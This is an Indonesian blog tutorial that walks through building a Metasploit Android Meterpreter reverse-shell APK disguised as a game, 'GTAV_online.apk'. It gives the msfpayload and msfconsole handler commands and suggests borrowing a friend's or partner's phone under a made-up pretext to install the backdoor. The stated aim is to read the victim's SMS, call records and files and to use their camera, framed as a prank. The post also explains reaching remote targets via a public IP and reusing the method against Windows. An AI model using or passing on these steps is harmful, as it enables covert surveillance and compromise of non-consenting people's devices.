Ads Area

Exploit Android Teman Anda Menggunakan Apk Backdoor Metasploit Kalilinux atau Backtrak



assalamualaikum wr,wb.
ok apa itu Exploit?
[baca disini]
jadi ane kali ini mau ngebahas cara menjaili Android teman ente haha, hanya untuk iseng-isengan saja, dan sekedar memberi ilmu sedikit, sebelum mengikuti tutorial ini anda harus menggunakan OS backtrack atau kalilinux, dan jika ente pengguna windows bisa download Metasploit Freameworknya.
namun saat ini ane mau ngasih tutorial buat yang memakai OS backtrack atau kalilinux.

ok,langsung saja ketutorial;
buka Terminal kesayangan sejuta umat

dan ketik perintah berikut: 
~# msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 LPORT=404 R> Bacdoor/GTAV_online.apk

keterangan:
LHOST=192.168.0.4 adalah IP localhost ane dan rubah dengan IP local ente/IP Public ente
LPORT=404 adalah port ane dan rubah sesuka hati,(Bebas)
Bacdoor/ adalah tempat diaman ane ingin menyimpan Apk exploit tepatnya /home/Backdoor/
GTAV_online.apk adalah Apk exploit ane (rename_seukamu.apk)


kemudian hasil akan berada pada /home/Backdoor/


dan agar kejailan kita dapat berlangsung install Apk tadi di Smartfone  Android teman ente, dengan alesan yang ente buat-buat,
contoh "bro minjem hp donk numpang sms. pacar gua sms tapi gua kagak punya pulsa nih" setelah android diatangan ente, kirim lewat bluetooth dan install diandroid teman atau pacar ente,


kemudian kembali kekalilinux atau backtarck lagi, dan klik Applications > Kali Linux (Backtarack) > Exploitation Tools > Metasploit > metasploit freamwork .

atau bisa ketik diterminal dengan perintah ~# msfconsole

setelah itu ketikan perintah berikut:
exploit (handler) > set lhost 192.168.0.4
exploit (handler) > set lport 404
exploit (handler) > exploit



kemudian kita akan terhubung ke Android teman kita tadi, dan kita bisa mengintip sms,telpone record hpnya, dan kameranya.
jika di penunjuk posisi terminal ente berubah menjadi meterpreter > bukan exploit (handler) > bukan juga exploit (handler) > apalagi ~#
maka itu tanda bahwa ente berhasil, dan dapat meremote Android terkorban (terduga) hahahaha

ketik perintah berikut untuk mengetahui perintah perintah yang dapatat dieksekusi:
meterpreter > help atau meterpreter > ?

ketikan perintah berikut jika ingin memoto melalui kalera terkorban:

untuk masuk kedirectory atau filemanager terkorban ketikan perintah:
ls

dan jika ingin melihat pesan-pesan korban (sms) ketik perintah berikut:
file akan tersimpan ke /home/

dan coba buka

catatan:
tutorial ini menggunakan jaringan Local, atau jaringan KaliLinux(backrack) dan Android Menggunakan 1 jaringan menggunakan WIFI.
dan bila ingin meremote dengan jarak jauh,antar pulau dan benua, maka rubah IP Lokal 192.168.0.4 tadi, menjadi IP PUBLIC.
dan jika ingin mengExploit Windows
yang tadinya nama filenya GTAV_online.apk rubah menjadi GTAV_online.exe ingat (.EXE)
untuk cara sama saja, 

ok, sekian tutorial atau cara, berjail-jailnya hahaha, jangan disalah gunakan ya, ane tdak bertanggung jawab jika terjadi apa-apa, karena saya hanya ingin sharing :)

Jangan Pelit-Pelit Untuk Follow Blog Ini Ya!!